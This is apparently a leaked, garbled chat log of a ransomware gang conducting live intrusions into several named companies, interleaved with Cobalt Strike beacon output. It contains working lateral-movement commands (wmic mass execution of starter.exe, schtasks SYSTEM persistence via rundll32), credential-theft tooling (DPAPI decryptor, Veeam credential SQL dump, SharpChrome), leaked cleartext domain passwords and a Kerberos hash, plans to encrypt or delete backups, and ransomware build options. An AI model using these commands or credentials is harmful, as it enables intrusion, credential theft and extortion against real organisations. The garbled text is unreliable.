\DCVEEAM02.Wilsonart.com\I$ - Default share \DCVEEAM02.Wilsonart.com\IPC$ - Remote IPC \DCVEEAM02.Wilsonart.com/J$ - Default share \DCVEEAM02.Wilsonart.com\K$ - Default share \\DCVEEAM02.Wilsonart.com\L$ - Default share \\DCVEEAM02.Wilsonart.com\M$ - Default share \DCVEEAM02.Wilsonart.com\N$ - Default share \DCVEEAM02.Wilsonart.com\O$ - Default share \DCVEEAM02.Wilsonart.com\P$ - Default share \ED79160W10P.Wilsonart.com/ADMIN$ - Remote Admin \ED79160W10P.Wilsonart.com$ - Default share \ED79160W10P.Wilsonart.com/IPC$ - Remote IPC \76406W7E64.Wilsonart.com/ADMIN$ - Remote Admin \76406W7E64.Wilsonart.com\C$ - Default share \76406W7E64.Wilsonart.com/IPC$ - Remote IPC \73860W7P.Wilsonart.com/ADMIN$ - Remote Admin \73860W7P.Wilsonart.com\C$ - Default share \73860W7P.Wilsonart.com\IPC$ - Remote IPC \dcwas88.Wilsonart.com/ADMIN$ - Remote Admin \dcwas88.Wilsonart.com\C$ - Default share \dcwas88.Wilsonart.com\D$ - Default share \dcwas88.Wilsonart.com\E$ - Default share \dcwas88.Wilsonart.com\IPC$ - Remote IPC \dcwas88.Wilsonart.com\print$ - Printer Drivers \ES79799W10P64.Wilsonart.com/ADMIN$ - Remote Admin \ES79799W10P64.Wilsonart.com\C$ - Default 
share \ES79799W10P64.Wilsonart.com\IPC$ - Remote IPC \78179W7P.Wilsonart.com/ADMIN$ - Remote Admin \78179W7P.Wilsonart.com\C$ - Default share \78179W7P.Wilsonart.com/IPC$ - Remote IPC \75537W7P.Wilsonart.com/ADMIN$ - Remote Admin \\75537W7P.Wilsonart.com\C - \75537W7P.Wilsonart.com$ - Default share \\\75537W7P.Wilsonart.com\HP LJ300-400 color M351-M451 PCL 6 (Copy 1) - HP LJ300-400 color M351-M451 PCL 6 (Copy 1) \\75537W7P.Wilsonart.com\IPC$ - Remote IPC \\Print$ - Printer Drivers \\76032W10E.Wilsonart.com/ADMIN$ - Remote Admin \\{\76032W10E.Wilsonart.com/C$ - Default share \76032W10E.Wilsonart.com/D$ - Default share \\76032W10E.Wilsonart.com\Downloads - \76032W10E.Wilsonart.com\E$ - Default share \76032W10E.Wilsonart.com/F$ - Default share \76032W10E.Wilsonart.com\IPC$ - Remote IPC \\76032W10E.Wilsonart.com\ISOs - \76032W10E.Wilsonart.com\print$ - Printer Drivers \\76032W10E.Wilsonart.com\Users - \\76032W10E.Wilsonart.com\VMShare - \\75574W7P.Wilsonart.com\ADMIN$ - Remote Admin \75574W7P.Wilsonart.com/C$ - Default share \75574W7P.Wilsonart.com/IPC$ - Remote IPC \\QABIHFM.Wilsonart.com/ADMIN$ - Remote Admin \\QABIHFM.Wilsonart.com$ - Default share \\QABIHFM.Wilsonart.com/D$ - Default share \\QABIHFM.Wilsonart.com \QABIHFM.Wilsonart.com FFDMEE - \\QABIHFM.Wilsonart.com IPC$ - Remote IPC \\QABIHFM.Wilsonart.com/ODI_Migrations - \DCWAS09.Wilsonart.com/ADMIN$ - Remote Admin \\DCWAS09.Wilsonart.com DC$ - Default share \DCWAS09.Wilsonart.com/F$ - Default share \DCWAS09.Wilsonart.com\IPC$ - Remote IPC \\Print$ - Printer Drivers \\RicohSecurePrint - Ricoh Secure Print \EL77610W10E.Wilsonart.com/ADMIN$ - Remote Admin \EL77610W10E.Wilsonart.com\C$ - Default share \EL77610W10E.Wilsonart.com/IPC$ - Remote IPC \PRDBITAB.Wilsonart.com/ADMIN$ - Remote Admin \PRDBITAB.Wilsonart.com/Backups - \PRDBITAB.Wilsonart.com\C$ - Default share \\PRDBITAB.Wilsonart.com\D$ - Default share \PRDBITAB.Wilsonart.com\Essbase_Extract_for_Tableau - \PRDBITAB.Wilsonart.com\IPC$ - Remote IPC 
\78220W7P.Wilsonart.com/ADMIN$ - Remote Admin \78220W7P.Wilsonart.com$ - Default share \78220W7P.Wilsonart.com/IPC$ - Remote IPC \EL80150W10P64.Wilsonart.com/ADMIN$ - Remote Admin \EL80150W10P64.Wilsonart.com\C$ - Default share \EL80150W10P64.Wilsonart.com\IPC$ - Remote IPC \EL80150W10P64.Wilsonart.com\print$ - Printer Drivers \LWDA-DC.Wilsonart.com\Accounting - \LWDA-DC.Wilsonart.com/ADMIN$ - Remote Admin \LWDA-DC.Wilsonart.com\C$ - Default share \LWDA-DC.Wilsonart.com\CADCode - \LWDA-DC.Wilsonart.com\D$ - Default share \LWDA-DC.Wilsonart.com\DallasFiles - \LWDA-DC.Wilsonart.com\DallasManagerFiles - \LWDA-DC.Wilsonart.com\E$ - Default share \LWDA-DC.Wilsonart.com\IPC$ - Remote IPC \LWDA-DC.Wilsonart.com\morbi - \LWDA-DC.Wilsonart.com\Scans - \LWDA-DC.Wilsonart.com/Schedule - \78167W7P.Wilsonart.com/ADMIN$ - Remote Admin \78167W7P.Wilsonart.com/C$ - Default share \78167W7P.Wilsonart.com/IPC$ - Remote IPC \78167W7P.Wilsonart.com/print$ - Printer Drivers \\Ricoh M2554 - Ricoh M2554 \\DST01W7P64.Wilsonart.com/ADMIN$ - Remote Admin \DT01W7P64.Wilsonart.com\C$ - Default share \DT01W7P64.Wilsonart.com/IPC$ - Remote IPC \78735W10E64.Wilsonart.com/ADMIN$ - Remote Admin \78735W10E64.Wilsonart.com\C$ - Default share \78735W10E64.Wilsonart.com/IPC$ - Remote IPC \80109W10P.Wilsonart.com/ADMIN$ - Remote Admin \80109W10P.Wilsonart.com\C$ - Default share \80109W10P.Wilsonart.com\IPC$ - Remote IPC \78140W7P.Wilsonart.com/ADMIN$ - Remote Admin \78140W7P.Wilsonart.com$ - Default share \78140W7P.Wilsonart.com\IPC$ - Remote IPC ``Are the balls out of the entry point? 
where are the lists ea dk la daa check 1 on ad usersponti not run the batcher with 6 commands check one command at a time but i advise you to be sured take everything off and it seems to be taken off like a quarantine will be like in the last griddon't touch at all or try to remove?+ the quarantines he trusts himself 7 times there but there are many fewer of them here and so do the kerbsvot)a trust is a trust (depending on the connections between them) get it worked out the keyatrasts are removed without admin rights so without fucking around like I do inside the network there's no one else to go around okay I understand you got fucked with the trusts the rest we'll see in the process theoretically yes as long as you're on the domain wide webcam it's just a matter of putting in the crosses it's all possible calling the piped commands in the batch is consistently better if you put in the crosses minimizes bugs under the token not plus I would add YES crosses to run vmice just in case change it to cmd / ok, got it, remove gzpnez run what is "run" anyway? run why?)
and tweaked it incorrectly therec:\starter.exe and by the way, better to copy directly to the root wmicexec_command (can't remember the exact name of the msg module, but something like that) they both even take hashes if you don't have clears at hand in any way.Then run them you can just spread the "first part" of the batch files you can also psekzekomno you can vmik by YES this will "go" easier vmik really will not run from the systema stask is necessary? vmik will not run this exeсhnik easier? the second part where sstask - awfulnapernaya part okv files i had it from somewhere nu okainet.no? it like right on the mdsn there.so you wrote it you at least read the syntax schtasks ?some nonsense in will not live itself? `` `` for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%%i\C$\Windows\System32\starter.exe && wmic /node:%%i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt ``@tl2 add me in fusionfirst.local+slypad flewKidai, we have to wait until the working day in texas is over. because we're already falling asleep, my head does not work ... and in general, what I meant about "sensitive" network - rather a serious monitoring events, where the whole network is covered by EDR agents, monitoring systems, and other bugs and again ... hack is a thing "not static", something will close - something will open which is little different from the real hell Azure clouds just provide right out of the box their Azure-ADmicrosoft is moving towards the introduction of their clouds in the first place if we talk about "not a small" network with these settings it can not administer it roughly speakingthis network simply will not work@user1 what you described is not possible in practiceesdonate the enemy freeze and lagmas are still a little too much work with "sensitive" networks - but when it comes to these ... 
in general, you already understand that you can "break everything" even with a VPN. and sometimes this is the only method ... there will be many cases where it can be used outside the context of specific users by manipulating even remotely the file system and domainmogranomogromnuyu plus, here guides are inappropriate slightly such "direct" because it is one of the key storage mechanisms of kredevo the essence of DPAPI attack this is a question you should ask yourself)))) rhetorical question:grin:fuck, I spent all night this masterkey and did not get anything in the end, throw all in sprouselawdobavl) tell me who to add to this confab it's time to add all of us to this confab so no one there did not dovabile Chet@user7 if it applies to any grid - please throw in the appropriate confabstealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM/mimikatz is it able to change back to known? no, password ok. but how to change the hash? you can do it with . you can just go through the kmdata I don't know where to go more)) change user password) lol or the question is how to do it more convenient? and can you elaborate)) on the hash that he had change then go back to him underneath 1qwerty1 I searched for configurations, did not find (you can set the user ntlm hash of any known cleartext password `` `` so you're looking for a cleartext, plus you can set your password hash to a user and then change it back ``` i think i wrote it clearly.config searched for password plus'a itself? under the right user can not log in under ntlm and deployment in your own place and full download the folder with the client there are a million variants that "no"? on rd tried to go where the client stands? if it's not possible to erase it, then it's not possible to enter where the client is standing, so look for cleartext, plus you can set your password hash to the user and then change it back no cleartext from rdn and no connection via ntlm? 
the client that sends@user9 to the cloud with web authorization? with the cloud - look for cloud and treem there - everything is simple here If you can't overwrite it, it means there's nothing on our network yet... all the computers have been searched, people don't leave passwords in chrome files there's Passwords Plus - they store passwords there, but it's in the cloud and you can't get it BUT you can fight them, they might be available through some interface and you can overwrite all the tapes, there's even a demagrid function in the closet sometimes) this cold tape backups is probably the hardest, and often impossible to solve and they usually have EVERYTHING to do with av/backups/directories of servers. most often all this is managed by 3-4-5 people even in large networks the main and most important! the most important thing is to study the contents of the tacs/howdirs/browsers of the IT people. Only with experience will you figure out how to work with them. just read the docs...veeam, acronis, ironmount, etc. practically everywhere +- same backup is used in general, as for the backup@user9 yes. here's an example of a fucking backup well get it yes, java gobbling up. decide 4 gb max 2x24x4 tiles? comps are ancient ugu16 gig total? ddr2?????? we have ddr2 at 4g slots no more. and some mothers do not support more? ``` Acronis Backup 11.7 Management Console 11.7.50058 "Worse than Explorer on Windows Okay, I heard about the RAM, but it's faster. The fucking RAM is eating everything. I'm running out of RAM. What does System Load show? does it gobble up RAM? 
:zany_face:Computers hang demonically! You can not just open the kobu browser and notepad! `8. you have three now, do you need more? if so - tell me which servers and how many you need `as needed so, gentlemen, on questions 1. smb_login with creeds on DK / net use on DK / login to outlook or webmail (if domain authorization is tied) / ldap_login (https://github.com/lanjelot/patator) e.g. by patator 2. First part - rudimentary LM hash, you can safely forget about what it is we have and will always be the same, the second - NTLM hash, actually the one that we use often for authorization 3. will be later, you can set up tasks through the admin interface for hash decrypt and bruteforce passwords/docs/excelniks 4. https://github.com/0xthirteen/StayKit - all the fixing techniques are described here and divided into categories and levels of privileges, there's nothing to describe here in more detail, there are no "unique" techniques for the Windows systems for years.
There are alternative things such as web shells on web servers (this is aspx code which is placed on the webserver, in this case IIS where the functional application "lives" - most often and most conveniently placed on the Exchange), there is an IIS module. So far, stop at stay-kit'e because it gives insight, in the future just give you a handy tool to fix it simply by running a dll 5. everything on the network is administered by people. the key to getting the most detailed data on the studied IS is in the admins / network engineers. That includes diagrams and accesses and everything else. You can only use them to identify cloud or taped backups or circumstantial evidence (services/tasks on critical servers, hell records, etc.). 6. the question is incorrect. it does not "need" to do, smb_pipe is essentially just a kind of load which is +- technically equal to bind payload in metasploit, used for machines with authorization restrictions or for machines that can not give outward access on the standard http(s)/dns/tcp protocol, that is jump psexec(_psh) 10.0.0.1 pipe is a service creation for bind pipe which then connects the initiating machine 7. give you the builder of the dll files 8. You now have three of them, you need more? If so, tell me which servers and how many you need 9. Why does it hang? I do not know. it's ok, it's ok, I got kicked out of the new rocket, it's alive now.
1. https://50.233.57.77 2fa, there's nothing in the bookmarks, backup codes don't work. Try to add your bookmark here. 2. https://173.247.171.106 - #grantweber-com have access to nas and to av, no to the sphere, looked everywhere, can close 172.81.67.174 (retif.com) no creds from NAS that in work from them (skype ip) and at what stage or for what reason is not in work 3 vpna issued so tell me tipshotpay friends really want to sleep, very hung up today tomorrow, tell @tl1 he will order a new one and shoot this one if there is trouble) or a new domain, I don't know) fix kobuuli plzili 5 minutes hangs on, then resets again u user4 session alive i think i have a problem with cobalt domainlists of all lA's wherever they were taken, send them to the groupada, almost the same everywhere and do not roll on the server from all 10 were taken off lA?
10 + and how many user's? and check just net view on this host on the user's go and on the user's? in lps write a new passport access to change the password where he writes that he has access to the balls admin$ remote and tds what servers? without a domain not allowed, but we removed users from the servers, and there is no this user and his group without a domain? yes says just usmb_login what does it say to these hosts? and you have checked all hosts? user8 no, I will not say the parameters, and the context was microadmin (nddevbernst) and what was the context at the time of launch and parameters? but it does not go there no many where admin sharytam was above output user8 ran, all outputs did not work lol you have not run before? there 20500 pc) Invoke-ShareFinder works, but tightly see the domain?

```
beacon> execute-assembly /home/user/TOOLS/2/SharpShares.exe shares
[*] Tasked beacon to run .NET program: SharpShares.exe shares
[+] host called home, sent: 117815 bytes
[+] received output:
[*] Parsed 0 computer objects.
```

Is there anything you can do about it?) **deadly wait** sessions will not wait for file in cis32 directory and disallow its deletion. The "poc.exe" simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations) this is what i don't understand, it seems to move the dll to cis32 and ros.exe to run it, it's not only move it, but run it as a LA to the file and it gives us the ability to run it as an admin, we have access only to the file and it's there, ok, we run it as a user without rights, it gives you user rights if you're an admin?)) and not vice versa?
And in this case we have rights to run our file from this path. The point is that this cis32 lies in the admin$ ball and if you have access there, it gives you admin rights/system. It's clear. But as I understand the whole point of this movement is to put your file in istem32 without rights. And then this fact should be used in some way. But how it is not clear. It seems, that there you can run applications from it, which UAC will not swear, but I am not sure) for according to the author's article, when loop ntuser.pol works it removes the file from system32 but its essence is that it monitors when file is created and prohibits its deletion.exe? as far as I understand it is very simple, but I could be wrong well, it exists now, but in new sessions not a fact) Well, the implementation is a little bit vague) I read, but users on computers did not find it. Yes, and the system is everywhere who checked? still the same at 10 +- current users are nowhere else LA? with what? by the way, what about ava? about what time? still the same, can not get YES and can not get on the cars that interest us, so what do we have on the current grid? aha okada, a week ago + I told you all the new cobs? a little later I will say new sessions today will be daponyalon Tutu 3 again I fucked up ... those who are in the network I now 4 7 9 user8 sickly4) I have rocket lag or you only 3 now? Hello Hello all on new now to clarify - while with the old let me refine East old do not know where to go to the old Da, while in the old. New will be? hello everyone) there's a session to work with?
hello more changed. you said it was broken then) the same thing with the password there was a case I do not remember what network then it is not broken

```
execute-assembly /home/input0/Cobalt/tools/Ghostpack-CompiledBinaries-master/SharpChrome.exe logins /pvk:C:\ProgramData\ntds_capi_0_93f29a7d-eed3-4c1f-99bf-ebeb7603cd2d.keyx.rsa.pvk
```

4 script http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/ did not understand the outdated dpapi year mod is not removed crooked? All that is chrome and chromium? There is a polzak that walks but the password is not removed above I discounted how it is removed crooked

```
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$ ?c$C?
```

[bleep] it's in the cloud.
```csharp
using System;
using System.Security.Cryptography;
using System.Text;

namespace Main
{
    internal static class Program
    {
        // Unprotects a base64-encoded, machine-scope DPAPI blob and prints it with its label.
        // DataProtectionScope.LocalMachine: the blob only decrypts on the machine that protected it.
        private static void Decrypt(string b, string a)
        {
            if (string.IsNullOrEmpty(a))
            {
                return;
            }
            byte[] encryptedData = Convert.FromBase64String(a);
            Console.WriteLine(b + ':' + Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine)));
        }

        private static void Main(string[] args)
        {
            Decrypt("bakkeOffice", "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAGyv+yhssxEaNJF2obQfCSwQAAAACAAAAAAAQZgAAAAEAACAAAADMbPI8UL6dI5ivLmmtbfPselp0losssqbnFyWIqg29eAAAAAAOgAAAAAIAACAAAACnK/tIFTdbgO3ok5+WFnVl/d/uIE8YgcLB4YG5seXZVxAAAABLnxZoyMe7WVmWzeeRMB4CQAAAAIoDxg8RrE5TlSrxAt7CBh+arMdVWKWT0SCoWio0nUMPFXBBSP5NQ0tWZd5V8r6WzOqKWVYWOHBBocQR61bQx98=");
        }
    }
}
```

```
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,49264 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc] FROM [VeeamBackup].[dbo].[Credentials];"
```

We want to access the server to the remote desktop group and check Credentials from vyam. Alas not let.

```
BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?
BALLYMOREGROUP\CITAdministrator L0ndonT0w3r2009!
BALLYMOREGROUP\bespadmin drithEyuDAZ07ac
BALLYMOREGROUP\nreid D0niford1259!
```

You already? You need a new kobanet, you didn't get it. i found the creeds and from yes and the accesses to the dk and accesses to servers where yes and damin sit, but the creeds have changed a month ago, and those that are - are outdated( lsadump::cchenet I mean mscache? mimikatz vault::cred I saw another one on the nc, vault::cred is updated once a month 7 months ago I think the module you use is from what year?
Give me the profile listing may not have any saved inputs in mozilla I hope with a fresh head we'll solve it quickly in the morning with mozilla, I can't do anything today if you have a problem with snapshots tomorrow we can't start we'll finish tomorrow? so guys the profile is appdata if he has an active session there
you will immediately catch it, now + history get his saved passwords, and decrypt and on the local dedice check his profile under socket all is simple, you need to get the folder of the profile itself easy mozilla, well ej with esplorer it good no see, try to see what in fsa c$ see? rpc is cnavaliblE does it work? cheated)) only psekzek works wmik works you said program program files lists processova how to know? -web browser nekoKa ? then answer the question I asked an hour ago it's not the command. the other arm is so pulled

```
shell SCHTASKS /Create /S 10.22.0.13 /u gophersport.local\schtask /p rehpog2013! /tn "OnDemand checking" /tr "cmd.exe /c rundll32 c:\windows\system32\shc.dll entryPoint" /sc onstart /RU SYSTEM
```

dll that you scrambled, seems to work but the session dies very quickly. winrms and vmi and psek seems to work, but the session does not come. shtask disabled like `ERROR: The request is not supported.` so you have here what? so we have not even seen the browser, what kind of browser he has? we can not get on the armies and the admin too in his browser? have found the sphere, but no credits found it? still there is a nuance with the whole sphere, try to get to the admins on the computer, go to work with your colleagues if there 100% sure in everything becaps, virtualization, av and so on then super) you have a network all? already all ready then the build should be ready today, so do not wait until tomorrow key then I think 6 is enough

```
-size[10/15/20/25/30/35/40/45/50/60/70/80] This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
```
At the same time databases are 100% encrypted, VM files are 20% encrypted regardless of the value of the parameter. aha can you write to him in the course @tl2 can he know? I have doubts for 6 hours

```
Shares for 10.2.1.21:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
RAID1
ServerHD
SSDRAID2
TIF Archive
Web
```

schtask I don't know the principle there's at least one of us I think it depends on the power of the environment where you run it, but I don't really know what's going on there, you have two large drives, you have two metrics, what was the slider like 40 percent when I looked through the goo, isn't the build probably not fully encrypting large files?

```
Volume in drive L is DRnetapp02a
Volume Serial Number is 802E-2DBA
Directory of l:\
06/08/2020 03:53 PM Backups
04/22/2016 10:00 AM VeeamWAN
0 File(s) 0 bytes
2 Dir(s) 2,537,787,944,960 bytes free
```

Well hhhh2tb)

```
[+] received output:
Volume in drive L is DRnetapp01a
Volume Serial Number is AA21-9C34
Directory of L:\
06/09/2020 09:00 PM Backups
05/09/2019 01:49 PM ProgramData
10/24/2016 08:24 AM VeeamWAN
0 File(s) 0 bytes
3 Dir(s) 2,094,574,211,072 bytes free
```

or what's the metric there dir Z:\ yeah, let's not fuck it up before closing time) I don't remember, I'll go look on rdp+? How much disk volume is there? I think in 6 hours you can touch a shitload of files in general 6 hours for the whole process is even better That current time is: 9:50:34 at 11a.m. no 39 give me the time again from there like in our 11 p.m. they will have 11 p.m. or something so backups will have to start early tomorrow morning if that's the case the server check to avmozhet it ...
well I think even windef cut before starting most likely they will only have sessions the rest in mapvot look how many without avmov) `[+] No EDR products found! Operate at your own risk!` edr look there where tried nu. i remember. it fell off today just because i myself dragged it)) hmm, print dragged it try it there is a server there z1print then - does not work with two dll with the flag stay? and dll check it out so we continue to look) you have a chance to check everything because tomorrow will not have time for this) not the fact that there is a here hz. i think it viam stores there. and gpervisors do not see them at all we get virtualization stores snapshots on that drive? to check that it works to start with 1-2 servers in the coba through the dlle with it you could close 2 there is another network on the way not just sit and wait would have to wait until 2-3 am) they have 9 am, just started a working day) also an option dao, then tomorrow morning and we will start?) there is no way) fuck it again at night to close? if we start under the noses of the admins they just reboot everything and the drive on the over a dozen gb not even half-encrypted we will not start now anyway they have a working day closer to the beginning of the issuing build? better in the cipher locally rebuild exactly working version davay shelkodma in oldkoba 4.2 started? or are you working in the old one? or even through a VPN? of course not 100% sure, but it looks like a disk connected to the wiame-oan. if there is third party information, it is not worth trying there is a suggestion to format and defragment the whole disk are backups? the current time is: 9:11:35.49 tell me more time there then in the encryption which OS disks were lying where again? but such a volume will be long encrypted at all so i think it is better to encrypt, and deleted can be restored of course) we have access to this disk?
there is an interesting system - there is such a thing called veeam one. I climbed into its admin panel, looked at what's up and found two servers with disk D (conditionally) connected to a gigabyte and there are backups scanners do not sleep) and where do they lie? backups of virtualisks we found, but what's better to delete them, or to encrypt? in msfvpska also seems to be fallen into the wrong place, constantly flying out and falling off in my new kobu nothing at all does not fly) but I'll probably give 3 kobu for 4.2 solve the question may be kobu fallen - so ... well Trendmicro not so biting and another thing) `[+] Trend Micro Inc Found!` I can't go to any of the armies... and edr_query, what does it say? Maybe it'll let me through to the new kobs... I don't know what's on the armies, it's cutting sessions off oh, yeah really? Did the sharpshooter work?

```
Administrator backup erictitchenal ilssql mattpeterson o365sync schtask symbackup trackit veeambackup veeamone watchguard
User: erictitchenal - IP Address: 10.22.0.10 (r90sflx3)
User: mattpeterson - IP Address: 10.22.0.13 10.10.0.54 (itvm1) (z1ftp)
```

```
gophersport.local\schtask rehpog2013!
gophersport.local\symbackup rehpog2013!
gophersport.local\veeambackup rehpog2013!
gophersport.local\veeamone KA7KYbbmDC5LMmMn
```

Go to @user4 in the meantime, then check the settings on the list we've done so yeah, it's not working, sessions are dropping out I was starting you that way so throw it in the dllchet no sessions from user4 and you can't backup a session for @user9 like I did? I'm gonna go check the time, there are no more ready 23.106.160.195 mine) CobaltStrike C2s on Port 443 - Pastebin.com pastebin.com
Maybe give me, too, and then also 20 percent attracts lno 4.2 there is a 4.2? My apparently lit up, do not fly sessions 9 + otpingoval servaks and armas. Found backups. AD can not take the perspiration, even on the DK, but there, mostly nothing has changed. Remains to find out what's virtualization, sort servos and can close - so order the build, maybe today and will close, there are already ready for the next stage) ta I already removed the disink) here I have a skull admin skul there stover there will be YES somewhere on the shul servake tut already gone beyond the point of entry and well the more you gather up a pool of work for later the better, until the grid is dismantled to the state dama will not close.

```
kbhost2.korbel.com ESXI 5.5
kbhost1.korbel.com ESXI 5.5
colohost2.korbel.com ESXI 5.5
kbhost3.korbel.com ESXI 5.5
colohost1.korbel.com ESXI 5.5
kb-hqucs1.korbel.com Virtual Host Servers
vcenter.korbel.com VCENTER
```

+ av yes I'll look for the sphere creeds $krb5tgs$23$sqladmin$korbel.com$MSSQLSvc/cognos2.korbel.com

```
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Adobe Acrobat Update Task                12/21/2020 1:00:00 PM  Ready
AM Transformer Cube Builds               12/22/2020 6:00:00 AM  Ready
Microsoft SvcRestartTask#23731           12/21/2020 12:56:24 PM Ready
```

Did you do it?) and the stack under the system mask under the canonical name in the system32 hide the old dll delete this stack on that machine did you also flash on the server just swam the head, disassemble the stack from the userdir under the userdir that is delete the stack Microsoft autoupdate#94110 Is.

```
Microsoft autoupdate#94110               12/21/2020 12:51:30 PM Ready
```

The dll start with the rundle and create the taska itself.
show me the fucking stask on that machine already) you can't run it more than once you almost fucked up the system already told 1 dll = 1 run already fuckin' time just like you told the dll ??? run the stask what the fuck are you doing one minute

```
beacon> shell SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[*] Tasked beacon to run: SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[+] host called home, sent: 211 bytes
[+] received output:
ERROR: Invalid syntax. Cannot specify user name without specifying system name.
Type "SCHTASKS /?" for usage.
```

Cook what 15 minutes? That's not fast as shit! Fix it, it's a fucking bug (that's what the fuck is this... see what the fuck is this?
You run it in system32 and you run it on the server, you fuckin' check it `C:\Users\cognos\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt01.dll` x64 x64 security dll, jump to the server, and backdoor there. Yes.

```
* Username : daniel.harvey_adm
* Domain   : KORBEL
* Password : W3lcome?
* Username : adaudit
* Domain   : korbel
* Password : #aud1T#
* Username : ben.mandeville
* Domain   : KORBEL
* Password : 1234qwerASDF!@#$
```

Balls see right away maybe the current username can't do anything.

```
The request will be processed at a domain controller for domain korbel.com.
Group name     Domain Admins
Comment        Designated administrators of the domain
Members
-------------------------------------------------------------------------------
adaudit agpm_admin barry.levine_adm ben.mandeville ben.mandeville_adm carol.macdonell_adm daniel.harvey daniel.harvey_adm dcbackup Honcho Jcomfort josue.gonzalez josue.gonzalez_adm kbveeamadmin KB-WMI-Monitor panuserID Russell.Bartson_adm SMSadmin SMTP-Relay solarwindows SolarWinds-LDAP sqlbackup switchscan tracy.mcmahan_adm vcentersvc veeamadmin
The command completed successfully.

[+] received output:
The request will be processed at a domain controller for domain korbel.com.
Group name     Enterprise Admins
Comment        Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
adaudit carol.macdonell_adm daniel.harvey_adm Honcho josue.gonzalez_adm Russell.Bartson_adm SMSadmin SMTP-Relay sqlbackup vcentersvc
The command completed successfully.

[+] received output:
The request will be processed at a domain controller for domain korbel.com.
Alias name     administrators
Comment        Members can fully administer the computer/domain
Members
-------------------------------------------------------------------------------
carol.macdonell ContentSubmitters Domain Admins Enterprise Admins Honcho josue.gonzalez SMTP-Relay Tmcmahan tracy.mcmahan_adm
The command completed successfully.
```
That's it for now, leave it for now, is there anything else to dig or go help? I'm telling you, just live, that's all.

```
beacon> portscan 10.1.10.0/16 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.1.10.0/16
[+] host called home, sent: 93245 bytes
[+] received output:
```

portscan by /16 masks stupid question - how? no one in the office, no one gave an answer check if there are vorkgroups near us, they are pure live under 16 and that's it we had a 2416 mask what? yesterday I do not remember it, put port scan to /16 mask won dtsink won tell me what to do now

```
_-_-_-_-_-_-_-_-_-_-_-_-_-_--> [+] INSTALLED SOFTWARE <-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Some weird software? Check for vulnerabilities in unknowable software installed
[?]
```
```
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
7-Zip
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft Office
Microsoft Office 15
Microsoft.NET
ModifiableWindowsApps
ossec-agent
Teams Installer
UNP
Velociraptor
Windows Defender
Windows Defender
Windows Defender Advanced Threat Protection
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
Windows NT
Windows NT
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
Windows Security
WindowsPowerShell
WindowsPowerShell
InstallLocation REG_SZ C:\Program Files\7-Zip\
InstallLocation REG_SZ C:\Program Files (x86)\Microsoft Office
```

I started it up and then I remembered that there is no chrome there sharpweb by the way it doesn't take off chrome unfortunately chrome via sharptchrome or mimicom before I did it without

```
10.1.10.11:445 (platform: 500 version: 10.0 name: LENDING3 domain: NORTHERNTRUST)
10.1.10.20:445 (platform: 500 version: 10.0 name: FILE1 domain: NORTHERNTRUST)
10.1.10.59:445 (platform: 500 version: 10.0 name: ACC1 domain: NORTHERNTRUST)
10.1.10.100:445 (platform: 500 version: 10.0 name: HR1 domain: NORTHERNTRUST)
10.1.10.103:445 (platform: 500 version: 10.0 name: IT1 domain: NORTHERNTRUST)
10.1.10.104:445 (platform: 500 version: 10.0 name: LENDING1 domain: NORTHERNTRUST)
10.1.10.210:445 (platform: 500 version: 10.0 name: AUTOMATE1 domain: NORTHERNTRUST)
10.1.10.240:445 (platform: 500 version: 6.3 name: BACKUP1 domain: NORTHERNTRUST)
10.1.10.250:445 (platform: 500 version: 6.3 name: DC1 domain: NORTHERNTRUST)
10.1.10.251:445 (platform: 500 version: 10.0 name: DC3 domain: NORTHERNTRUST)
```

```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent:
```
```
705073 bytes
[+] received output:
=== Chrome (All Users) ===
=== Checking for Firefox (All Users) ===
=== Checking Windows Vaults ===
```

and give me a dump of the browser from the pc where it started without `icmp 1024` I have a portscan short for 445 at all? There's one subnet 10.1.10.0 vmemt) for 443 like yesterday? make the dump from your trastdump I do not see so, now parsing netvorak, it turns out? Here's all the servers from ad_computer

```
DC1.Northerntrust.local
DC3.Northerntrust.local
Automate1.Northerntrust.local
Backup1.Northerntrust.local
File1.Northerntrust.local
```

did what I know? `\Administrator:Abcd1234!` Administrator I got a session on dc @tl1 eun

```
[DC] 'Northerntrust.local' will be the domain
[DC] 'DC1.Northerntrust.local' will be the DC server
[DC] Exporting domain 'Northerntrust.local'
```
